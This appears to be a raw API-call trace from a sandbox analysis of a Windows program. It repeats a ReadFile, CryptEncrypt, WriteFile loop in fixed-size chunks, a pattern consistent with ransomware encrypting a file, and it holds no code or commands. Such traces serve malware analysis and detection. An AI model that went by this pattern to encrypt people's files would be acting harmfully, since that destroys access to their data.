ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.559] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.560] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.562] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.563] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.564] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.564] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.564] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.564] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.564] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.566] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 